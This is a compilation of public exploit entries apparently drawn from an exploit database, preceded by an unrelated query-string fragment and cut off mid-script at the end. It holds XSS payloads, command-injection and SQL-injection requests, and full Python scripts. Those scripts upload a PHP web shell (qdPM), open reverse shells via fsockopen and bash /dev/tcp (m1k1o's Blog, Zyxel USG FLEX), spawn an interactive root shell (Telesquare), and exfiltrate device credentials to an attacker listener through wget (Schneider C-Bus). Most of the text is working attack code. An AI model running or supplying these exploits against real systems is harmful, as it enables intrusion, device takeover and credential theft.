&UruneKargoUcretsiz=0&UyeUcretsizKargo=0&BayiUcretsizKargo=0&Sayisal1=0
# Exploit Title: Survey Sparrow Enterprise Survey Software 2022 - Stored Cross-Site Scripting (XSS)
# Date: May 11 2022
# Exploit Author: Pankaj Kumar Thakur
# Vendor Homepage: https://surveysparrow.com/
# Software Link: https://surveysparrow.com/enterprise-survey-software/
# Version: 2022
# Tested on: Windows
# CVE : CVE-2022-29727
# References:
https://www.tenable.com/cve/CVE-2022-29727
https://github.com/haxpunk1337/Enterprise-Survey-Software/blob/main/Enterprise-Survey-Software%202022
#POC
For Stored XSS
Visit
https://LOCALHOST/login?test=Javascript%26colon;%252F%252F%E2%80%A9confirm?.(document.cookie)//
XSS Executed
# Exploit Title: SolarView Compact 6.0 - OS Command Injection
# Date: 2022-05-15
# Exploit Author: Ahmed Alroky
# Author Company : AIactive
# Version: ver.6.00
# Vendor home page : https://www.contec.com/
# Authentication Required: No
# CVE : CVE-2022-29303
# Tested on: Windows
# Exploit
# HTTP Request :
POST /conf_mail.php HTTP/1.1
Host: HOST_IP
Content-Length: 77
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://HOST_IP
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://HOST_IP/conf_mail.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
mail_address=%3Bid%3Bwhoami%3Bpwd%3Bls%3B&button=%83%81%81%5B%83%8B%91%97%90M
# Exploit Title: Showdoc 2.10.3 - Stored Cross-Site Scripting (XSS)
# Exploit Author: Akshay Ravi
# Vendor Homepage: https://github.com/star7th/showdoc
# Software Link: https://github.com/star7th/showdoc/releases/tag/v2.10.3
# Version: <= 2.10.3
# Tested on: macOS Monterey
# CVE : CVE-2022-0967
Description: Stored XSS via uploading file in .ofd format
1. Create a file with .ofd extension and add XSS Payload inside the file
filename = "payload.ofd"
payload = "<script>alert(1)</script>"
2. Login to showdoc v2.10.2 and go to file library
Endpoint = "https://www.site.com/attachment/index"
3. Upload the payload on file library and click on the check button
4. The XSS payload will executed once we visited the URL
# Exploit Title: OpenCart v3.x Newsletter Module - Blind SQLi
# Date: 19/05/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.opencart.com/
# Software Link: https://www.opencart.com/index.php?route=marketplace/extension/info&extension_id=32750&filter_member=Zemez
# Version: v.3.0.2.0
# Tested on: XAMPP, Linux
# Contact: https://twitter.com/dmaral3noz
* Description :
Newsletter Module is compatible with any Opencart allows SQL Injection via parameter 'zemez_newsletter_email' in /index.php?route=extension/module/zemez_newsletter/addNewsletter.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
* Steps to Reproduce :
- Go to : http://127.0.0.1/index.php?route=extension/module/zemez_newsletter/addNewsletter
- Save request in BurpSuite
- Run saved request with : sqlmap -r sql.txt -p zemez_newsletter_email --random-agent --level=5 --risk=3 --time-sec=5 --hex --dbs
Request :
===========
POST /index.php?route=extension/module/zemez_newsletter/addNewsletter HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: OCSESSID=aaf920777d0aacdee96eb7eb50
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 29
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Connection: Keep-alive
zemez_newsletter_email=saud
===========
Output :
Parameter: zemez_newsletter_email (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: zemez_newsletter_email=saud%' AND 4728=(SELECT (CASE WHEN (4728=4728) THEN 4728 ELSE (SELECT 4929 UNION SELECT 7220) END))-- -
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: zemez_newsletter_email=saud%' OR (SELECT 4303 FROM(SELECT COUNT(*),CONCAT(0x716a6b7171,(SELECT (ELT(4303=4303,1))),0x7162787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'xlVz%'='xlVz
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: zemez_newsletter_email=saud%' AND (SELECT 5968 FROM (SELECT(SLEEP(5)))yYJX) AND 'yJkK%'='yJkK
# Exploit Title: Contao 4.13.2 - Cross-Site Scripting (XSS)
# Google Dork: NA
# Date: 04/28/2022
# Exploit Author: Chetanya Sharma @AggressiveUser
# Vendor Homepage: https://contao.org/en/
# Software Link: https://github.com/contao/contao/releases/tag/4.13.2
# Version: [ 4.13.2 ]
# Tested on: [KALI OS]
# CVE : CVE-2022-1588
# References:
- https://huntr.dev/bounties/df46e285-1b7f-403c-8f6c-8819e42deb80/
- https://github.com/contao/contao/security/advisories/GHSA-m8x6-6r63-qvj2
- https://contao.org/en/security-advisories/cross-site-scripting-via-canonical-url.html
---------------
Steps to reproduce:
Navigate to the below URL
URL: https://localhost/contao/"><svg//onload=alert(112233)>
# Exploit Title: m1k1o's Blog v.10 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-01-06
# Exploit Author: Malte V
# Vendor Homepage: https://github.com/m1k1o/blog
# Software Link: https://github.com/m1k1o/blog/archive/refs/tags/v1.3.zip
# Version: 1.3 and below
# Tested on: Linux
# CVE : CVE-2022-23626
import argparse
import json
import re
from base64 import b64encode
import requests as req
from bs4 import BeautifulSoup
parser = argparse.ArgumentParser(description='Authenticated RCE File Upload Vulnerability for m1k1o\'s Blog')
parser.add_argument('-ip', '--ip', help='IP address for reverse shell', type=str, default='172.17.0.1', required=False)
parser.add_argument('-u', '--url', help='URL of machine without the http:// prefix', type=str, default='localhost',
required=False)
parser.add_argument('-p', '--port', help='Port for the Blog', type=int, default=8081,
required=False)
parser.add_argument('-lp', '--lport', help='Listening port for reverse shell', type=int, default=9999,
required=False)
parser.add_argument('-U', '--username', help='Username for Blog user', type=str, default='username', required=False)
parser.add_argument('-P', '--password', help='Password for Blog user', type=str, default='password', required=False)
args = vars(parser.parse_args())
username = args['username']
password = args['password']
lhost_ip = args['ip']
lhost_port = args['lport']
address = args['url']
port = args['port']
url = f"http://{address}:{port}"
blog_cookie = ""
csrf_token = ""
exploit_file_name = ""
header = {
"Host": f"{address}",
"Content-Type": "multipart/form-data; boundary=---------------------------13148889121752486353560141292",
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"X-Requested-With": "XMLHttpRequest",
"Csrf-Token": f"{csrf_token}",
"Cookie": f"PHPSESSID={blog_cookie}"
}
def get_cookie(complete_url):
global blog_cookie
cookie_header = {}
if not blog_cookie:
cookie_header['Cookie'] = f"PHPSESSID={blog_cookie}"
result = req.get(url=complete_url, headers=cookie_header)
if result.status_code == 200:
blog_cookie = result.cookies.get_dict()['PHPSESSID']
print(f'[+] Found PHPSESSID: {blog_cookie}')
grep_csrf(result)
def grep_csrf(result):
global csrf_token
csrf_regex = r"[a-f0-9]{10}"
soup = BeautifulSoup(result.text, 'html.parser')
script_tag = str(soup.findAll('script')[1].contents[0])
csrf_token = re.search(csrf_regex, script_tag).group(0)
print(f'[+] Found CSRF-Token: {csrf_token}')
def login(username, password):
get_cookie(url)
login_url = f"{url}/ajax.php"
login_data = f"action=login&nick={username}&pass={password}"
login_header = {
"Host": f"{address}",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"X-Requested-With": "XMLHttpRequest",
"Csrf-Token": f"{csrf_token}",
"Cookie": f"PHPSESSID={blog_cookie}"
}
result = req.post(url=login_url, headers=login_header, data=login_data)
soup = BeautifulSoup(result.text, 'html.parser')
login_content = json.loads(soup.text)
if login_content.get('logged_in'):
print('[*] Successful login')
else:
print('[!] Bad login')
def set_cookie(result):
global blog_cookie
blog_cookie = result.cookies.get_dict()['PHPSESSID']
def generate_payload(command):
return f"""
-----------------------------13148889121752486353560141292
Content-Disposition: form-data; name="file"; filename="malicious.gif.php"
Content-Type: application/x-httpd-php
GIF<?php system(base64_decode('{b64encode(bytes(command, 'utf-8')).decode('ascii')}')); ?>;
-----------------------------13148889121752486353560141292--
"""
def send_payload():
payload_header = {
"Host": f"{address}",
"Content-Type": "multipart/form-data; boundary=---------------------------13148889121752486353560141292",
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"X-Requested-With": "XMLHttpRequest",
"Csrf-Token": f"{csrf_token}",
"Cookie": f"PHPSESSID={blog_cookie}"
}
upload_url = f"http://{address}:{port}/ajax.php?action=upload_image"
command = f"php -r '$sock=fsockopen(\"{lhost_ip}\",{lhost_port});exec(\"/bin/bash <&3 >&3 2>&3\");'"
payload = generate_payload(command)
print(f"[+] Upload exploit")
result = req.post(url=upload_url, headers=payload_header, data=payload, proxies= {"http": "http://127.0.0.1:8080"})
set_exploit_file_name(result.content.decode('ascii'))
def set_exploit_file_name(data):
global exploit_file_name
file_regex = r"[a-zA-Z0-9]{4,5}.php"
exploit_file_name = re.search(file_regex, data).group(0)
def call_malicious_php(file_name):
global header
complete_url = f"{url}/data/i/{file_name}"
print('[*] Calling reverse shell')
result = req.get(url=complete_url)
def check_reverse_shell():
yes = {'yes', 'y', 'ye', ''}
no = {'no', 'n'}
choice = input("Have you got an active netcat listener (y/Y or n/N): ")
if choice in yes:
return True
elif choice in no:
print(f"[!] Please open netcat listener with \"nc -lnvp {lhost_port}\"")
return False
def main():
enabled_listener = check_reverse_shell()
if enabled_listener:
login(username, password)
send_payload()
call_malicious_php(exploit_file_name)
if __name__ == "__main__":
main()
# Exploit Title: qdPM 9.1 - Remote Code Execution (RCE) (Authenticated)
# Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net
# Date: 2021-08-03
# Original Exploit Author: Rishal Dwivedi (Loginsoft)
# Original ExploitDB ID: 47954 (https://www.exploit-db.com/exploits/47954)
# Exploit Author: Leon Trappett (thepcn3rd)
# Vendor Homepage: http://qdpm.net/
# Software Link: http://qdpm.net/download-qdpm-free-project-management
# Version: <=1.9.1
# Tested on: Ubuntu Server 20.04 (Python 3.9.2)
# CVE : CVE-2020-7246
# Exploit written in Python 3.9.2
# Tested Environment - Ubuntu Server 20.04 LTS
# Path Traversal + Remote Code Execution
# Exploit modification: RedHatAugust
#!/usr/bin/python3
import sys
import requests
from lxml import html
from argparse import ArgumentParser
session_requests = requests.session()
def multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, uservar):
request_1 = {
'sf_method': (None, 'put'),
'users[id]': (None, userid[-1]),
'users[photo_preview]': (None, uservar),
'users[_csrf_token]': (None, csrftoken_[-1]),
'users[name]': (None, username[-1]),
'users[new_password]': (None, ''),
'users[email]': (None, EMAIL),
'extra_fields[9]': (None, ''),
'users[remove_photo]': (None, '1'),
}
return request_1
def req(userid, username, csrftoken_, EMAIL, HOSTNAME):
request_1 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, '.htaccess')
new = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_1)
request_2 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, '../.htaccess')
new1 = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_2)
request_3 = {
'sf_method': (None, 'put'),
'users[id]': (None, userid[-1]),
'users[photo_preview]': (None, ''),
'users[_csrf_token]': (None, csrftoken_[-1]),
'users[name]': (None, username[-1]),
'users[new_password]': (None, ''),
'users[email]': (None, EMAIL),
'extra_fields[9]': (None, ''),
'users[photo]': ('backdoor.php', '<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>', 'application/octet-stream'),
}
upload_req = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_3)
def main(HOSTNAME, EMAIL, PASSWORD):
url = HOSTNAME + '/index.php/login'
result = session_requests.get(url)
#print(result.text)
login_tree = html.fromstring(result.text)
authenticity_token = list(set(login_tree.xpath("//input[@name='login[_csrf_token]']/@value")))[0]
payload = {'login[email]': EMAIL, 'login[password]': PASSWORD, 'login[_csrf_token]': authenticity_token}
result = session_requests.post(HOSTNAME + '/index.php/login', data=payload, headers=dict(referer=HOSTNAME + '/index.php/login'))
# The designated admin account does not have a myAccount page
account_page = session_requests.get(HOSTNAME + 'index.php/myAccount')
account_tree = html.fromstring(account_page.content)
userid = account_tree.xpath("//input[@name='users[id]']/@value")
username = account_tree.xpath("//input[@name='users[name]']/@value")
csrftoken_ = account_tree.xpath("//input[@name='users[_csrf_token]']/@value")
req(userid, username, csrftoken_, EMAIL, HOSTNAME)
get_file = session_requests.get(HOSTNAME + 'index.php/myAccount')
final_tree = html.fromstring(get_file.content)
backdoor = requests.get(HOSTNAME + "uploads/users/")
count = 0
dateStamp = "1970-01-01 00:00"
backdoorFile = ""
for line in backdoor.text.split("\n"):
count = count + 1
if "backdoor.php" in str(line):
try:
start = "\"right\""
end = " </td"
line = str(line)
dateStampNew = line[line.index(start)+8:line.index(end)]
if (dateStampNew > dateStamp):
dateStamp = dateStampNew
print("The DateStamp is " + dateStamp)
backdoorFile = line[line.index("href")+6:line.index("php")+3]
except:
print("Exception occurred")
continue
#print(backdoor)
print('Backdoor uploaded at - > ' + HOSTNAME + 'uploads/users/' + backdoorFile + '?cmd=whoami')
if __name__ == '__main__':
print("You are not able to use the designated admin account because they do not have a myAccount page.\n")
parser = ArgumentParser(description='qdmp - Path traversal + RCE Exploit')
parser.add_argument('-url', '--host', dest='hostname', help='Project URL')
parser.add_argument('-u', '--email', dest='email', help='User email (Any privilege account)')
parser.add_argument('-p', '--password', dest='password', help='User password')
args = parser.parse_args()
# Added detection if the arguments are passed and populated, if not display the arguments
if (len(sys.argv) > 1 and isinstance(args.hostname, str) and isinstance(args.email, str) and isinstance(args.password, str)):
main(args.hostname, args.email, args.password)
else:
parser.print_help()
# Exploit Title: Zyxel USG FLEX 5.21 - OS Command Injection
# Shodan Dork: title:"USG FLEX 100" title:"USG FLEX 100W" title:"USG FLEX 200" title:"USG FLEX 500" title:"USG FLEX 700" title:"USG20-VPN" title:"USG20W-VPN" title:"ATP 100" title:"ATP 200" title:"ATP 500" title:"ATP 700" title:"ATP 800"
# Date: May 18th 2022
# Exploit Author: Valentin Lobstein
# Vendor Homepage: https://www.zyxel.com
# Version: ZLD5.00 thru ZLD5.21
# Tested on: Linux
# CVE: CVE-2022-30525
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import sys
import json
import base64
import requests
import argparse
parser = argparse.ArgumentParser(
prog="CVE-2022-30525.py",
description="Example : python3 %(prog)s -u https://google.com -r 127.0.0.1 -p 4444",
)
parser.add_argument("-u", dest="url", help="Specify target URL")
parser.add_argument("-r", dest="host", help="Specify Remote host")
parser.add_argument("-p", dest="port", help="Specify Remote port")
args = parser.parse_args()
banner = (
"ICwtLiAuICAgLCAsLS0uICAgICAsLS4gICAsLS4gICwtLiAgLC0uICAgICAgLC0tLCAgLC0uICA7"
"LS0nICwtLiAgOy0tJyAKLyAgICB8ICAvICB8ICAgICAgICAgICApIC8gIC9cICAgICkgICAgKSAg"
"ICAgICAvICAvICAvXCB8ICAgICAgICkgfCAgICAKfCAgICB8IC8gICB8LSAgIC0tLSAgIC8gIHwg"
"LyB8ICAgLyAgICAvICAtLS0gIGAuICB8IC8gfCBgLS4gICAgLyAgYC0uICAKXCAgICB8LyAgICB8"
"ICAgICAgICAgLyAgIFwvICAvICAvICAgIC8gICAgICAgICAgKSBcLyAgLyAgICApICAvICAgICAg"
"KSAKIGAtJyAnICAgICBgLS0nICAgICAnLS0nICBgLScgICctLScgJy0tJyAgICAgYC0nICAgYC0n"
"ICBgLScgICctLScgYC0nICAKCVJldnNoZWxscwkoQ3JlYXRlZCBCeSBWYWxlbnRpbiBMb2JzdGVp"
"biA6KSApCg=="
)
def main():
print("\n" + base64.b64decode(banner).decode("utf-8"))
if None in vars(args).values():
print(f"[!] Please enter all parameters !")
parser.print_help()
sys.exit()
if "http" not in args.url:
args.url = "https://" + args.url
args.url += "/ztp/cgi-bin/handler"
exploit(args.url, args.host, args.port)
def exploit(url, host, port):
headers = {
"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0",
"Content-Type": "application/json",
}
data = {
"command": "setWanPortSt",
"proto": "dhcp",
"port": "4",
"vlan_tagged": "1",
"vlanid": "5",
"mtu": f'; bash -c "exec bash -i &>/dev/tcp/{host}/{port}<&1;";',
"data": "hi",
}
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
print(f"\n[!] Trying to exploit {args.url.replace('/ztp/cgi-bin/handler','')}")
try:
response = requests.post(
url=url, headers=headers, data=json.dumps(data), verify=False, timeout=5
)
except (KeyboardInterrupt, requests.exceptions.Timeout):
print("[!] Bye Bye hekcer !")
sys.exit(1)
finally:
try:
print("[!] Can't exploit the target ! Code :", response.status_code)
except:
print("[!] Enjoy your shell !!!")
if __name__ == "__main__":
main()
#!/usr/bin/python3
# Exploit Title: Telesquare SDT-CW3B1 1.1.0 - OS Command Injection
# Date: 24th May 2022
# Exploit Author: Bryan Leong <NobodyAtall>
# Vendor Homepage: http://telesquare.co.kr/
# CVE : CVE-2021-46422
# Authentication Required: No
import requests
import argparse
import sys
from xml.etree import ElementTree
def sysArgument():
ap = argparse.ArgumentParser()
ap.add_argument("--host", required=True, help="target hostname/IP")
args = vars(ap.parse_args())
return args['host']
def checkHost(host):
url = "http://" + host
print("[*] Checking host is it alive?")
try:
rsl = requests.get(url)
print("[*] The host is alive.")
except requests.exceptions.Timeout as err:
raise SystemExit(err)
def exploit(host):
url = "http://" + host + "/cgi-bin/admin.cgi?Command=sysCommand&Cmd="
#checking does the CGI exists?
rsl = requests.get(url)
if(rsl.status_code == 200):
print("[*] CGI script exist!")
print("[*] Injecting some shell command.")
#1st test injecting id command
cmd = "id"
try:
rsl = requests.get(url + cmd, stream=True)
xmlparser = ElementTree.iterparse(rsl.raw)
cmdRet = []
for event, elem in xmlparser:
if(elem.tag == 'CmdResult'):
cmdRet.append(elem.text)
except:
print("[!] No XML returned from CGI script. Possible not vulnerable to the exploit")
sys.exit(0)
if(len(cmdRet) != 0):
print("[*] There's response from the CGI script!")
print('[*] System ID: ' + cmdRet[0].strip())
print("[*] Spawning shell. type .exit to exit the shell", end="\n\n")
#start shell iteration
while(True):
cmdInput = input("[SDT-CW3B1 Shell]# ")
if(cmdInput == ".exit"):
print("[*] Exiting shell.")
sys.exit(0)
rsl = requests.get(url + cmdInput, stream=True)
xmlparser = ElementTree.iterparse(rsl.raw)
for event, elem in xmlparser:
if(elem.tag == 'CmdResult'):
print(elem.text.strip())
print('\n')
else:
print("[!] Something doesn't looks right. Please check the request packet using burpsuite/wireshark/etc.")
sys.exit(0)
else:
print("[!] CGI script not found.")
print(rsl.status_code)
sys.exit(0)
def main():
host = sysArgument()
checkHost(host)
exploit(host)
if __name__ == "__main__":
main()
# Exploit Title: Schneider Electric C-Bus Automation Controller (5500SHAC) 1.10 - Remote Code Execution (RCE)
# Exploit Author: LiquidWorm
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# Schneider Electric C-Bus Automation Controller (5500SHAC) 1.10 Remote Root Exploit
#
#
# Vendor: Schneider Electric SE
# Product web page: https://www.se.com | https://www.clipsal.com
# Product details:
# - https://www.clipsal.com/Trade/Products/ProductDetail?catno=5500SHAC
# - https://www.se.com/ww/en/product/5500AC2/application-controller-spacelogic-cbus-rs232-485-ethernet-din-mount-24v-dc/
# Affected version: CLIPSAL 5500SHAC (i.MX28)
# CLIPSAL 5500NAC (i.MX28)
# SW: 1.10.0, 1.6.0
# HW: 1.0
# Potentially vulnerable (alternative products/same codebase?): 5500NAC2 and 5500AC2
# SpaceLogic C-Bus
#
# Summary: The C-Bus Network Automation Controller (5500NAC) and the Wiser
# for C-Bus Automation Controller (5500SHAC)) is an advanced controller from
# Schneider Electric. It is specifically designed to unite the C-Bus home
# automation solution with common household communication protocols, from
# lighting and climate control, to security, entertainment and energy metering.
# The Wiser for C-Bus Automation Controller manages and controls C-Bus systems
# for residential homes or zones within a building and integrates functions
# such as heating/cooling, energy/load monitoring and remote control for C-Bus
# and Modbus.
#
# Desc: The automation controller suffers from an authenticated arbitrary
# command execution vulnerability. An attacker can abuse the Start-up (init)
# script editor and exploit the 'script' POST parameter to insert malicious
# Lua script code and execute commands with root privileges that will grant
# full control of the device.
#
# ------------------------------------------------------------------------------
# $ ./c-bus.py http://192.168.0.10 "cat /etc/config/httpd;id" 192.168.0.37 8888
# ----------------------------------------------------------------------
# Starting Z-Bus 2.5.1 ( https://zeroscience.mk ) at 15.03.2022 11:26:38
# [*] Starting exfiltration handler on port 8888
# [*] Writing Lua initscript... done.
# [*] Running os.execute()... done.
# [*] Got request from 192.168.0.10:33522
# [*] Printing target's request:
#
# b"GET / HTTP/1.1\r\nHost: 192.168.0.37:8888\r\nUser-Agent: \nconfig user
# 'admin'\n\toption password 'admin123'\n\nconfig user 'remote'\n\toption
# password 'remote'\n\nuid=0(root) gid=0(root) groups=0(root)\r\nConnection:
# close\r\n\r\n"
#
# [*] Cleaning up... done.
#
# $
# ------------------------------------------------------------------------------
#
# Tested on: CPU model: ARM926EJ-S rev 5 (v5l)
# GNU/Linux 4.4.115 (armv5tejl)
# LuaJIT 2.0.5
# FlashSYS v2
# nginx
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Macedonian Information Security Research and Development Laboratory
# Zero Science Lab - https://www.zeroscience.mk - @zeroscience
#
#
# Advisory ID: ZSL-2022-5707
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5707.php
#
#
# 12.03.2022
#
import threading#!
import datetime##!
import requests##!
import socket####!
import time######!
import sys#######!
import re########!
from requests.auth import HTTPBasicAuth
from time import sleep as spikaj
class Wiser:
def __init__(self):
self.headers = None
self.uri = '/scada-main/scripting/'
self.savs = self.uri + 'save'
self.runs = self.uri + 'run'
self.start = datetime.datetime.now()
self.start = self.start.strftime('%d.%m.%Y %H:%M:%S')
self.creds = HTTPBasicAuth('admin', 'admin123')
def memo(self):
if len(sys.argv) != 5:
self.use()
else:
self.target = sys.argv[1]
self.execmd = sys.argv[2]
self.localh = sys.argv[3]
self.localp = int(sys.argv[4])
if not 'http' in self.target:
self.target = 'http://{}'.format(self.target)
def exfil(self):
print('[*] Starting exfiltration handler on port {}'.format(self.localp))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('0.0.0.0', self.localp))
while True:
try:
s.settimeout(9)
s.listen(1)
conn, addr = s.accept()
print('[*] Got request from {}:{}'.format(addr[0], addr[1]))
data = conn.recv(2003)
print('[*] Printing target\'s request:')
print('\n%s' %data)
except socket.timeout as p:
print('[!] Something\'s not right. Check your port mappings!')
break
s.close()
self.clean()
def mtask(self):
konac = threading.Thread(name='thricer.exe', target=self.exfil)
konac.start()
self.byts()
def byts(self):
self.headers = {
'Referer':self.target+'/scada-main/main/editor?id=initscript',
'Sec-Ch-Ua':'"(Not(A:Brand";v="8", "Chromium";v="98"',
'Cookie':'x-logout=0; x-auth=; x-login=1; pin=',
'Content-Type':'text/plain;charset=UTF-8',
'User-Agent':'SweetHomeAlabama/2003.59',
'X-Requested-With':'XMLHttpRequest',
'Accept-Language':'en-US,en;q=0.9',
'Accept-Encoding':'gzip, deflate',
'Sec-Ch-Ua-Platform':'"Windows"',
'Sec-Fetch-Site':'same-origin',
'Connection':'keep-alive',
'Sec-Fetch-Dest':'empty',
'Sec-Ch-Ua-Mobile':'?0',
'Sec-Fetch-Mode':'cors',
'Origin':self.target,
'Accept':'*/*',
'sec-gpc':'1'
}
self.loada = '\x64\x61\x74\x61\x3D\x7B' # data={
self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x34\x22\x3A\x22\x22\x2C' # "ext-comp-1004":"",
self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x35\x22\x3A\x22\x22\x2C' # "ext-comp-1005":"",
self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x36\x22\x3A\x22\x22\x2C' # "ext-comp-1006":"",
self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x37\x22\x3A\x22\x22\x2C' # "ext-comp-1007":"",
self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x38\x22\x3A\x22\x22\x2C' # "ext-comp-1008":"",
self.loada += '\x22\x73\x63\x61\x64\x61\x2D\x68\x65\x6C\x70\x2D\x73\x65\x61\x72\x63\x68\x22\x3A\x22\x22\x2C' # "scada-help-search":"",
self.loada += '\x22\x69\x64\x22\x3A\x22\x69\x6E\x69\x74\x73\x63\x72\x69\x70\x74\x22\x2C' # "id":"initscript",
self.loada += '\x22\x73\x63\x72\x69\x70\x74\x22\x3A\x6E\x75\x6C\x6C\x2C' # "script":null,
self.loada += '\x22\x73\x63\x72\x69\x70\x74\x6F\x6E\x6C\x79\x22\x3A\x22\x74\x72\x75\x65\x22\x7D' # "scriptonly":"true"}
self.loada += '\x26\x73\x63\x72\x69\x70\x74\x3D\x6F\x73\x2E\x65\x78\x65\x63\x75\x74\x65' # &script=os.execute
self.loada += '\x28\x27\x77\x67\x65\x74\x20\x2D\x55\x20\x22\x60' # ('wget -U "`
self.loada += self.execmd # [command input]
self.loada += '\x60\x22\x20' # `".
self.loada += self.localh+':'+str(self.localp) # [listener input]
self.loada += '\x27\x29' # ')
self.loadb = '\x64\x61\x74\x61\x3D\x7B' # data={
self.loadb += '\x22\x69\x64\x22\x3A\x22\x69\x6E\x69\x74\x73\x63\x72\x69\x70\x74\x22\x7D' # "id":"initscript"}
print('[*] Writing Lua initscript... ', end='')
sys.stdout.flush()
spikaj(0.7)
htreq = requests.post(self.target+self.savs, data=self.loada, headers=self.headers, auth=self.creds)
if not 'success' in htreq.text:
print('didn\'t work!')
exit(17)
else:
print('done.')
print('[*] Running os.execute()... ', end='')
sys.stdout.flush()
spikaj(0.7)
htreq = requests.post(self.target+self.runs, data=self.loadb, headers=self.headers, auth=self.creds)
if not 'success' in htreq.text:
print('didn\'t work!')
exit(19)
else:
print('done.')
def splash(self):
Baah_loon = '''
######
##########
###### _\_
##===----[.].]
#( , _\\
# )\__|
\ /
`-._``-'
>@
|
|
|
|
| Schneider Electric C-Bus SmartHome Automation Controller
| Root Remote Code Execution Proof of Concept
| ZSL-2022-5707
|
|
|
'''
print(Baah_loon)
def use(self):
self.splash()
print('Usage: ./c-bus.py [target] [cmd] [lhost] [lport]')
exit(0)
def clean(self):
print('\n[*] Cleaning up... ', end='')
sys.stdout.flush()
spikaj(0.7)
self.headers = {'X-Requested-With':'XMLHttpRequest'}
self.blank = '\x64\x61\x74\x61\x3D\x25\x37\x42\x25\x32\x32'
self.blank += '\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30'
self.blank += '\x30\x34\x25\x32\x32\x25\x33\x41\x25\x32\x32'
self.blank += '\x25\x32\x32\x25\x32\x43\x25\x32\x32\x65\x78'
self.dlank = '\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x35'
self.dlank += '\x25\x32\x32\x25\x33\x41\x25\x32\x32\x25\x32'
self.dlank += '\x32\x25\x32\x43\x25\x32\x32\x65\x78\x74\x2D'
self.dlank += '\x63\x6F\x6D\x70\x2D\x31\x30\x30\x36\x25\x32'
self.clank = '\x32\x25\x33\x41\x25\x32\x32\x25\x32\x32\x25'
self.clank += '\x32\x43\x25\x32\x32\x65\x78\x74\x2D\x63\x6F'
self.clank += '\x6D\x70\x2D\x31\x30\x30\x37\x25\x32\x32\x25'
self.clank += '\x33\x41\x25\x32\x32\x25\x32\x32\x25\x32\x43'
self.slank = '\x25\x32\x32\x65\x78\x74\x2D\x63\x6F\x6D\x70'
self.slank += '\x2D\x31\x30\x30\x38\x25\x32\x32\x25\x33\x41'
self.slank += '\x25\x32\x32\x25\x32\x32\x25\x32\x43\x25\x32'
self.slank += '\x32\x73\x63\x61\x64\x61\x2D\x68\x65\x6C\x70'
self.glank = '\x2D\x73\x65\x61\x72\x63\x68\x25\x32\x32\x25'
self.glank += '\x33\x41\x25\x32\x32\x25\x32\x32\x25\x32\x43'
self.glank += '\x25\x32\x32\x69\x64\x25\x32\x32\x25\x33\x41'
self.glank += '\x25\x32\x32\x69\x6E\x69\x74\x73\x63\x72\x69'
self.hlank = '\x70\x74\x25\x32\x32\x25\x32\x43\x25\x32\x32'
self.hlank += '\x73\x63\x72\x69\x70\x74\x25\x32\x32\x25\x33'
